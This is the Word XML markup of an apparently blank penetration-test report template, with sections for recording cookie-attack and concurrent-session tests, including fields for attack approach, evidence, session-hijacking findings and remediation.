          <w:p w14:paraId="3399CC27" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="008C5C05" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E39CB50" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="008C5C05" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3269A3F0" w14:textId="77777777" w:rsidR="00F025BF" w:rsidRDefault="00F025BF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865CD4" w:rsidRPr="00A51A96" w14:paraId="6A82B6EF" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1DB6024B" w14:textId="2083BA0C" w:rsidR="00865CD4" w:rsidRPr="003C713F" w:rsidRDefault="00865CD4" w:rsidP="00725128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5.10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CE1D4F" w:rsidRPr="00CE1D4F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Cookie Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4614AE85" w14:textId="77777777" w:rsidR="000F3695" w:rsidRPr="00F62423" w:rsidRDefault="000F3695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58"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="3262"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C747D8" w:rsidRPr="00C747D8" w14:paraId="7647FFB5" w14:textId="77777777" w:rsidTr="00F62423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3BB8E05E" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D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502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E84589B" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D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747D8" w:rsidRPr="00C747D8" w14:paraId="16E926B0" w14:textId="77777777" w:rsidTr="00F62423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4329B4F2" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D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502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="320F7ADC" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D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747D8" w:rsidRPr="00C747D8" w14:paraId="0B047E52" w14:textId="77777777" w:rsidTr="00F62423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097DDC79" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D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502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7FB9B7" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D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97E4A" w:rsidRPr="007E4EF4" w14:paraId="0550CC49" w14:textId="77777777" w:rsidTr="00F62423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3CB03D64" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRPr="007E4EF4" w:rsidRDefault="00697E4A" w:rsidP="00F6242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Attack Performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="502FE6BD" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRDefault="00697E4A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8B3D074" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRPr="007E4EF4" w:rsidRDefault="00697E4A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97E4A" w:rsidRPr="007E4EF4" w14:paraId="012F9051" w14:textId="77777777" w:rsidTr="00F62423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07B9AD58" w14:textId="3F8087D2" w:rsidR="00697E4A" w:rsidRPr="007E4EF4" w:rsidRDefault="00AB7DBC" w:rsidP="00F6242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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0573FD9B" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRDefault="00697E4A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999CAAE" w14:textId="77777777" w:rsidR="00AB7DBC" w:rsidRDefault="00AB7DBC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93BAB82" w14:textId="77777777" w:rsidR="00AB7DBC" w:rsidRPr="007E4EF4" w:rsidRDefault="00AB7DBC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97E4A" w14:paraId="28337AF0" w14:textId="77777777" w:rsidTr="00F62423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41E5EAA7" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRDefault="00697E4A" w:rsidP="00F6242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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C67CF54" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRPr="00F40191" w:rsidRDefault="00697E4A" w:rsidP="00725128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F40191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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25898802" w14:textId="77777777" w:rsidR="00697E4A" w:rsidRDefault="00697E4A" w:rsidP="00725128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C747D8" w:rsidRPr="00C747D8" w14:paraId="0E1E3C51" w14:textId="77777777" w:rsidTr="00F62423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466EC54A" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Code Used to Set the Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229375E3" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D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747D8" w:rsidRPr="00C747D8" w14:paraId="28CF9E0F" w14:textId="77777777" w:rsidTr="00F62423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38FCA167" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D8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Unauthorized Access</w:t>
            </w:r>
            <w:r w:rsidRPr="00C747D8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to Accounts Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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EC8CC2D" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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C747D8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26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84DB96F" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8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C747D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C747D8" w:rsidRPr="00C747D8" w14:paraId="3F35B964" w14:textId="77777777" w:rsidTr="00F62423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3FEF6AE8" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D8"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 Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE52EBB" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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93E9DB8" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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23550E5" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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26D2BBF" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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1340DF6" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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5086C75" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D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72E89" w:rsidRPr="00C747D8" w14:paraId="3FE4E0B2" w14:textId="77777777" w:rsidTr="00F62423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6D431A77" w14:textId="13C4D047" w:rsidR="00D72E89" w:rsidRPr="00C747D8" w:rsidRDefault="00D72E89" w:rsidP="00F6242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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C007A55" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00D72E8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ED8B925" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00D72E8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9BE6099" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00D72E8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25B33F4" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRPr="00C747D8" w:rsidRDefault="00D72E89" w:rsidP="00D72E8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747D8" w:rsidRPr="00C747D8" w14:paraId="7BF5A6C8" w14:textId="77777777" w:rsidTr="00F62423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0B1618F5" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00F6242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47D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502" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C82A7F" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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F132C85" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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D9FB0BF" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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24C85B3" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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CB1F699" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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24E2BDE" w14:textId="77777777" w:rsidR="00C747D8" w:rsidRPr="00C747D8" w:rsidRDefault="00C747D8" w:rsidP="00C747D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28D29953" w14:textId="77777777" w:rsidR="00CE1D4F" w:rsidRDefault="00CE1D4F" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB7AAA7" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRPr="00A51A96" w:rsidRDefault="00D72E89" w:rsidP="00D72E89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lastRenderedPageBreak/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2E89" w14:paraId="6B463A1E" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="331A9C4A" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EEA91A3" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27E1CA05" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C0FF750" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B8F7535" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39902E1F" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D291AF8" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRDefault="00D72E89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A8465E" w:rsidRPr="00A51A96" w14:paraId="15BA003C" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7F164DF7" w14:textId="3D78F78E" w:rsidR="00A8465E" w:rsidRPr="003C713F" w:rsidRDefault="00A8465E" w:rsidP="00725128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5.11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A273FD" w:rsidRPr="00A273FD">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Concurrent Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AD3D190" w14:textId="77777777" w:rsidR="00D72E89" w:rsidRPr="00F62423" w:rsidRDefault="00D72E89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58"/>
        <w:gridCol w:w="6502"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w14:paraId="31A03071" w14:textId="77777777" w:rsidTr="00837168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33E0C709" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="0083716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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51407A49" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC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83ADC" w:rsidRPr="00C747D8" w14:paraId="082D9FBE" w14:textId="77777777" w:rsidTr="00837168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696F246F" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="0083716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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67D597CE" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC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83ADC" w:rsidRPr="00C747D8" w14:paraId="0105B6A1" w14:textId="77777777" w:rsidTr="00837168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5955F0B2" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="0083716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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50FFD11A" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC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83ADC" w14:paraId="1C328375" w14:textId="77777777" w:rsidTr="00837168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33B119AD" w14:textId="5F475B55" w:rsidR="00A83ADC" w:rsidRDefault="00E70EB0" w:rsidP="0083716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70EB0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Initial Session Creation Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C32C210" w14:textId="7138F2C6" w:rsidR="00A83ADC" w:rsidRDefault="00A83ADC" w:rsidP="00725128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F40191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E70EB0" w:rsidRPr="00E70EB0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Session ID Captured?</w:t>
            </w:r>
            <w:r w:rsidRPr="00F40191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4A9D6900" w14:textId="77777777" w:rsidR="00E70EB0" w:rsidRPr="00F40191" w:rsidRDefault="00E70EB0" w:rsidP="00725128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324BACD7" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRDefault="00A83ADC" w:rsidP="00725128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A83ADC" w:rsidRPr="00C747D8" w14:paraId="6AC934F0" w14:textId="77777777" w:rsidTr="00837168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58E9E0B1" w14:textId="40D78924" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="001B15A5" w:rsidP="0083716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B15A5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Multiple Concurrent Sessions Generated?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F12537" w14:textId="7E4691DD" w:rsidR="001B15A5" w:rsidRDefault="001B15A5" w:rsidP="001B15A5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F40191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Pr="00E70EB0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes/No, </w:t>
            </w:r>
            <w:r w:rsidRPr="001B15A5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Number of Sessions Created: XX</w:t>
            </w:r>
            <w:r w:rsidRPr="00F40191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3E3FA963" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRDefault="00A83ADC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F5DC131" w14:textId="77777777" w:rsidR="001B15A5" w:rsidRPr="00C747D8" w:rsidRDefault="001B15A5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B15A5" w:rsidRPr="00C747D8" w14:paraId="0848EED3" w14:textId="77777777" w:rsidTr="00837168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04C45374" w14:textId="3ED4059A" w:rsidR="001B15A5" w:rsidRPr="001B15A5" w:rsidRDefault="00A67C6A" w:rsidP="0083716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67C6A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session Validity Tested with Different Scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC23A71" w14:textId="77777777" w:rsidR="001B15A5" w:rsidRPr="00F40191" w:rsidRDefault="001B15A5" w:rsidP="001B15A5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A67C6A" w:rsidRPr="00C747D8" w14:paraId="0A0ED41F" w14:textId="77777777" w:rsidTr="00837168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6C83D042" w14:textId="43F1DEF3" w:rsidR="00A67C6A" w:rsidRPr="00A67C6A" w:rsidRDefault="00A67C6A" w:rsidP="0083716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67C6A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Same IP Testing Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C8E7A9E" w14:textId="77777777" w:rsidR="00A67C6A" w:rsidRDefault="00A67C6A" w:rsidP="001B15A5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765733" w:rsidRPr="00765733">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Multiple Sessions Allowed? Yes/No, Observations</w:t>
            </w:r>
            <w:r w:rsidR="00765733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24FE8EB7" w14:textId="77777777" w:rsidR="00765733" w:rsidRDefault="00765733" w:rsidP="001B15A5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17D96545" w14:textId="34F4998A" w:rsidR="00765733" w:rsidRPr="00F40191" w:rsidRDefault="00765733" w:rsidP="001B15A5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765733" w:rsidRPr="00C747D8" w14:paraId="2F9ED066" w14:textId="77777777" w:rsidTr="00837168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4D0407FD" w14:textId="77CCDB81" w:rsidR="00765733" w:rsidRPr="00A67C6A" w:rsidRDefault="00765733" w:rsidP="0083716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65733">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Different IP Testing Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7ACD06" w14:textId="77777777" w:rsidR="00765733" w:rsidRDefault="00765733" w:rsidP="001B15A5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EC4ED8" w:rsidRPr="00EC4ED8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Multiple Sessions Allowed? Yes/No, Observations</w:t>
            </w:r>
            <w:r w:rsidR="00EC4ED8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2278DBB3" w14:textId="77777777" w:rsidR="00EC4ED8" w:rsidRDefault="00EC4ED8" w:rsidP="001B15A5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2EB34D07" w14:textId="3B4C45E1" w:rsidR="00EC4ED8" w:rsidRDefault="00EC4ED8" w:rsidP="001B15A5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EC4ED8" w:rsidRPr="00C747D8" w14:paraId="66D29067" w14:textId="77777777" w:rsidTr="00837168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5721E643" w14:textId="49F0C6FB" w:rsidR="00EC4ED8" w:rsidRPr="00765733" w:rsidRDefault="00EC4ED8" w:rsidP="0083716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C4ED8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Different Location Testing Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F541917" w14:textId="77777777" w:rsidR="00EC4ED8" w:rsidRDefault="00EC4ED8" w:rsidP="001B15A5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Pr="00EC4ED8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Geo-Restrictions Applied? Yes/No, Observations</w:t>
            </w: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1D88DD98" w14:textId="77777777" w:rsidR="00EC4ED8" w:rsidRDefault="00EC4ED8" w:rsidP="001B15A5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4A8B8DFA" w14:textId="1ACD4D77" w:rsidR="00EC4ED8" w:rsidRDefault="00EC4ED8" w:rsidP="001B15A5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EC4ED8" w:rsidRPr="00C747D8" w14:paraId="705B2BE5" w14:textId="77777777" w:rsidTr="00837168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44E49C68" w14:textId="0C650F95" w:rsidR="00EC4ED8" w:rsidRPr="00EC4ED8" w:rsidRDefault="00123B3B" w:rsidP="0083716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23B3B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session Expiry &amp; Token Rotation Observed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FB439F3" w14:textId="77777777" w:rsidR="00EC4ED8" w:rsidRDefault="00123B3B" w:rsidP="001B15A5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Pr="00123B3B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Weaknesses Detected?</w:t>
            </w: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11512092" w14:textId="601FD0E1" w:rsidR="00123B3B" w:rsidRDefault="00123B3B" w:rsidP="001B15A5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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00123B3B" w:rsidRPr="00C747D8" w14:paraId="67C94505" w14:textId="77777777" w:rsidTr="00837168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02124C4E" w14:textId="083E6D8E" w:rsidR="00123B3B" w:rsidRPr="00123B3B" w:rsidRDefault="00D71C22" w:rsidP="0083716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71C22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Session Hijacking Possible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="391E5A6F" w14:textId="77777777" w:rsidR="00123B3B" w:rsidRDefault="00D71C22" w:rsidP="001B15A5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Pr="00D71C22">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Exploitable Vulnerabilities Found?</w:t>
            </w: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38E2DC2F" w14:textId="77777777" w:rsidR="00D71C22" w:rsidRDefault="00D71C22" w:rsidP="001B15A5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53386E54" w14:textId="77777777" w:rsidR="00D71C22" w:rsidRDefault="00D71C22" w:rsidP="001B15A5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4BD2EA5C" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="001B15A5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3F31D76A" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="001B15A5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377ECEBF" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="001B15A5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01413296" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="001B15A5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1305FD0B" w14:textId="61215CD8" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="001B15A5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A83ADC" w:rsidRPr="00C747D8" w14:paraId="4D23FDA5" w14:textId="77777777" w:rsidTr="00837168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29409DDF" w14:textId="4D9164AC" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00D71C22" w:rsidP="0083716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="00A83ADC" 